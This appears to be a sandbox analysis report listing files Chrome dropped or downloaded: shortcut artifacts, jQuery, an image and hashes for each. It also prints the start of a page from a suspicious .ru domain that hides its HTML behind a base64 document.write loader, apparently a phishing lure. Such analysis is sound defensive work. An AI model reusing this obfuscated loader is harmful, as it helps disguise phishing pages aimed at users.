                  Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............D:......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 20:14:07 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2677
                  Entropy (8bit):4.005587697269834
                  Encrypted:false
                  SSDEEP:
                  MD5:FEFD9C47A9964A9C6EBFD382048EF012
                  SHA1:545B2E44AA3D7D144D1A25101E9211394DA0C1B1
                  SHA-256:7125EF8C1C584285B4992D64B354021B9D3F5A6905998C9EE88A8BB75E7D29A5
                  SHA-512:A267E45693CA82EE27B2BCE02E2A77DE97A5022A686700C6A64C06990FFE8FF743C3AB3598A020E294A8D203CC67FDE24BEF41D1C3BC63E13910771E796589C9
                  Malicious:false
                  Reputation:unknown
                  Preview:L..................F.@.. ...$+.,.......i.g..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V/Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............D:......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 20:14:07 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2677
                  Entropy (8bit):3.9937290147418367
                  Encrypted:false
                  SSDEEP:
                  MD5:096B57E29DFE5448DE3E191CED9C42A9
                  SHA1:5F394DDABF5F555CFE991BEE642FA1BAE5A3943E
                  SHA-256:1465FA5139C7EF9190946BBC1C3AB502958673F1746FFB0BC0F9F4E2D84879FC
                  SHA-512:B6EB490B8D2511FC57DA4924FF84A76DF50B4451BDB838C5DD3B76C28589F127BD2D25317CAA3C9FC85F0045265E4C155C32B322656324C24BB85E234A86C182
                  Malicious:false
                  Reputation:unknown
                  Preview:L..................F.@.. ...$+.,....A..i.g..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V/Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............D:......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 20:14:06 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                  Category:dropped
                  Size (bytes):2679
                  Entropy (8bit):4.003104117343373
                  Encrypted:false
                  SSDEEP:
                  MD5:BDD72DF5A22C9392C8733EEA84049049
                  SHA1:506B7DEBA3D5A50C1EA81777BF92C560D282137C
                  SHA-256:2DC1F36ADA707A265EC2AB35673B5B16E4C0BAD3774F6FB843D48E2B9ABA127B
                  SHA-512:0259D572852003535DDFD1531FBBA379FF2559453330CA477CDA8295A87A56B11C0BD538DBF81B2E6A5927EEC32F87F0402C913CEF14D5A2F33E761BEE9040AC
                  Malicious:false
                  Reputation:unknown
                  Preview:L..................F.@.. ...$+.,.....Vxi.g..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V/Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............D:......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, ASCII text, with very long lines (65452), with CRLF line terminators
                  Category:downloaded
                  Size (bytes):443923
                  Entropy (8bit):3.310470626826174
                  Encrypted:false
                  SSDEEP:
                  MD5:E2A882EEA1156CBA4FAEC4F3EE3663A2
                  SHA1:1D77272BD017207793B104ADB2852E8CA76F18DF
                  SHA-256:65F7FB7712571640E9B3A8334848313CFCEAA4FE05EA33B3643D1F69F402FB2E
                  SHA-512:ECE453123FEB003C58189FAF033E8E255F00CCCBF210E21DB0D4245693AD0B794ABCFBCECD0D9CA6370F29B1423019F2552AA49B544B8A47638DBEDF08AF65FA
                  Malicious:false
                  Reputation:unknown
                  URL:https://krix.trilixorath.ru/fiAG/
                  Preview:<script>....if(atob("aHR0cHM6Ly9rcml4LnRyaWxpeG9yYXRoLnJ1L2ZpQUcv") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4NCiAgICA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZm9sbG93Ij4NCiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+DQogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPg0KPHN0eWxlPg0KYm9keSwgaHRtbCB7DQptYXJnaW46IDA7DQpwYWRkaW5nOiAwOw0KaGVpZ2h0OiAxMDAlOw0Kb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCg0KLmJhY2tncm91bmQtY29udGFpbmVyIHsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQogICAgaGVpZ2h0OiAxMDAlOw0KICAgIHdpZHRoOiAxMDAlOw0KfQ0KLmJhY2tncm91bmQtY29udGFpbmVyIC5iYWNrZ3JvdW5kIHsNCiAgICBjb250ZW50OiAiIjsNCiAgICBwb3NpdGlvbjogYWJzb2x1dGU7DQogICAgdG9wOiAwOw0KICAgIGxlZnQ6IDA7DQogICAgcmlnaHQ6IDA7DQogICAgYm90dG9tO
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65447)
                  Category:downloaded
                  Size (bytes):89501
                  Entropy (8bit):5.289893677458563
                  Encrypted:false
                  SSDEEP:
                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                  Malicious:false
                  Reputation:unknown
                  URL:https://code.jquery.com/jquery-3.6.0.min.js
                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with no line terminators
                  Category:downloaded
                  Size (bytes):16
                  Entropy (8bit):3.5
                  Encrypted:false
                  SSDEEP:
                  MD5:F1C9C44E663E7E62582E3F5B236C1C72
                  SHA1:E142F3A0C2D1CDF175A5C3AF43AD66FEFE208B1F
                  SHA-256:D843E67FBFA1F5CB0024062861EE26860C5A866F80755CF39B3465459A8538B9
                  SHA-512:19FE62CB9D884BB3424C51DD15E74EB22E5A639BABF8398BACEBB781862296FA0D7AEE39C88CB9C7AF5791FD58830AC3433F5C6BD94B1BA3912AB33151E93452
                  Malicious:false
                  Reputation:unknown
                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAmHE27Pf--PqBIFDTcwqTA=?alt=proto
                  Preview:CgkKBw03MKkwGgA=
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1741x979, Suserng: [none]x[none], YUV color, decoders should clamp
                  Category:dropped
                  Size (bytes):106290
                  Entropy (8bit):7.99716969201618
                  Encrypted:true
                  SSDEEP:
                  MD5:428183BFB7C31D8C3BCC985DAC004681
                  SHA1:691AE27C0FC2FE29732BD7C6907F4A9BE9253356
                  SHA-256:B4F40DAF431A5CF056DFFF45E867C8C24D8107505CD46FF17B0F9102E4FE3D2B
                  SHA-512:7E648B56988E9B66FCBE3DA447CEACFAC2A39D43D78604B50085CA3F64C898DDFD81F5C01F4A6854511BCC8845BABA7F8C4EC20974094F7F87AF27E4D1A78003
                  Malicious:false
                  Reputation:unknown
                  Preview:RIFF*...WEBPVP8 .....>...*....>.F.K...,..9A...in.f.Y....... j.........._.)|u.......=.?.....'M.W........c........t........7.'.o.?.{_..@?.z\z.~.{.. .C...W._........}@?..jt......?.?......../..<....._._....G...?........_........_._.................._........G.?.`.Q./..../.....o./.A......?.|.u/.?........s...?.............~.A.{.W....C.q.......?..`?....................y...........|..:.................k.....o..........u..................m.....{.....q..-..f.$M.. E........L'&..^...........<.y+.-.+..5.......b...FTM.c...............JMA...$...`+.x.]... ..7kc|..5....%.x.W{..&4......:.t....;.w@.....t..(.T)a6F........."......%\u...'D..........}..3....F.Lbh.g..g....-....3..%.W9....n.F~5R/5J..ql..~.F.B.LX.+...S.......+.0+c|...F........;.O..i.`..D.ez+uRj.I..9..e..q...;.u.c1.'itl...F....dx..pN......Y...|...&~>Q...o=.1`.)!.d.....A....~......8....Q.E.dj..V.`U...XUQ....o.}..pe%.-..H.....J.7........58.-.....".<..O._..N..;.i..b..1".I.}-...>......f.]...Ue....w.L._.z...
                  No static file info